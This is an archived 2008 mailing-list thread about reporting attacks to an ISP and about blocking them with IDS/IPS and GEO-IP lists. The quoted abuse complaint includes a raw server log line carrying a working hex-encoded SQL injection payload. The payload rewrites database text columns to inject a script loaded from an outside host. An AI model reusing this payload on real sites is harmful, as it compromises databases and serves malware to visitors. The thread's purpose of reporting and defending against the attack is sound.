Infiltration of ISP providers by crackers.

Wed Aug 27 11:52:34 UTC 2008

I do not normally bother following up on reports on all attacks. Most of 
them are scripted and there are too many. So, my IPS/IDS has a good list 
of 'not-to-block' IP addresses and whatever else outside this IP list 
attacks any service is blocked. Most good IPS/IDS vendors also provide 
near real-time lists of network blocks, especially from countries with 
large ISP segments that typically consist of various classes of IP 
blocks for home DSL/dialup customers, where most of the compromised PCs 
serve botnets and malicious scripters. This keeps the number of IPTABLES 
rules down and can block most of these annoying attacks.

GEO-IP blocking may also help if you definitely know that you should not 
be expecting traffic from any part of the world. Problem is you need to 
update the ip list regularly and be ready to accept some false positives 
from IPs that suddenly are legit.

For other types of more persistent and unusual attacks, you need to get 
in touch with the CERT team of a major telco provider. They are keen to 
know of these issues and if they provide the backbone of your 
connectivity, maybe there is part of your SLA that covers these sort of 
things, generally speaking.

GM

-- 
--
George Magklaras

Senior Computer Systems Engineer/UNIX Systems Administrator
EMBnet Technical Management Board
The Biotechnology Centre of Oslo,
University of Oslo
http://folk.uio.no/georgios

Jose R R wrote:
> So ...(sigh) what do you do when you complain to a given ISP provider about
> a case of attempted abuse by one of their IP addresses and you get a
> response from someone in the "security team" whose email name is "cracker?"
> 
> Apparently some (or many) of these crackers own (with their consent or not)
> even their ISP providers --or worse, some (or many) ISP providers may be
> crackers themselves!
> 
> A portion of my original complaint to the ISP --where I list one of the
> attempted abuse records by the cracker for informational purposes:
> 
> ----------------------------------------------------------------------------------
> from myself <my_emai_address> tonetwork-adm at hinet.net,
> network-center at hinet.net
> dateMon, Aug 25, 2008 at 11:37 PM subjectAbuse by user at IP address
> 118.167.20.180 mailed-bymy_domain
> 
> On August 25, 2008, from 08:52:10  am to 08:52:28 am (America/Tijuana time),
> user at IP address 118.167.20.180 abused <my> web site with the below
> referenced offending code (relevant web server log section is attached and
> named as abuse-118_167_20_180.txt).
> 
> 118.167.20.180 - - [25/Aug/2008:08:52:10 -0700] "GET
> /blog/index.php/2008/07/12/
> xenserver-4-1-and-32-bit-and-64-bit-virt?blog=4';DECLARE%20 at S
> %20CHAR(4000);SET%20 at S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474
703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
> HTTP/1.1" 400 567 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
> Foxy/1; Foxy/1; .NET CLR 1.1.4322)"
> 
> [...]
> 
> I would appreciate your cooperation in stopping this sort of cracker
> engagement.
> 
> Thank you in advance for your prompt attention to this issue.
> 
> ---------------End of portion of email
> sent----------------------------------------------------------------------------
> 
> 
> 
> Below is an Interesting section of one of the replies:
> 
> -------------------------------------------------------------------
> 
> Return-Path: <my_email_address>
> Received: from localhost (localhost [127.0.0.1])
>         by dns.adsl.hinet.net (8.12.3/8.12.3/Debian-6.6) with ESMTP id
> m7QA4XUN014545
>         for <cracker at localhost>; Tue, 26 Aug 2008 18:06:31 +0800
> [...]
> 
> ----------End of unformatted
> reply----------------------------------------------------------
> 
> 
> The above was attached to the formated email reply below:
> 
> ----------------------------------------------------------------------
> 
> from cracker at hinet.net to<my_email_address>
> dateTue, Aug 26, 2008 at 4:24 AM subject[HiNetSOC/Craker : 1219749049]HiNet
> Notification(HiNet 通知) mailed-bylcss.hinet.net
> hide details 4:24 AM (11 hours ago)
>  Reply
> 
> 
> Dear Sir:
> 
>  Thank you for your email. Please kindly provide us more detail information
> about the bad behavior at least including the attackers' IP address, time
> (GMT, Greenwich Mean Time) and evidence for further processing.
> - Hide quoted text -
> 
> Yours sincerely,
> 
> HiNet Security Operation Center
> Chunghwa Telecom Co., Ltd.
> Taipei, Taiwan, R.O.C.
> Email: cracker at hinet.net
> 
> 請參考您的原始檢舉信件再附加檔案
> 
> ------End of formatted email
> reply-------------------------------------------------------------------
> 
> No wonder spam and intrusion attempts never end.
> 
> Jose R R
> http://www.metztli-it.com
> 
> IBM Lotus Symphony <http://symphony.lotus.com> is officially supported on RH
> and SuSE; official Ubuntu support coming at the end of August 2008.
> 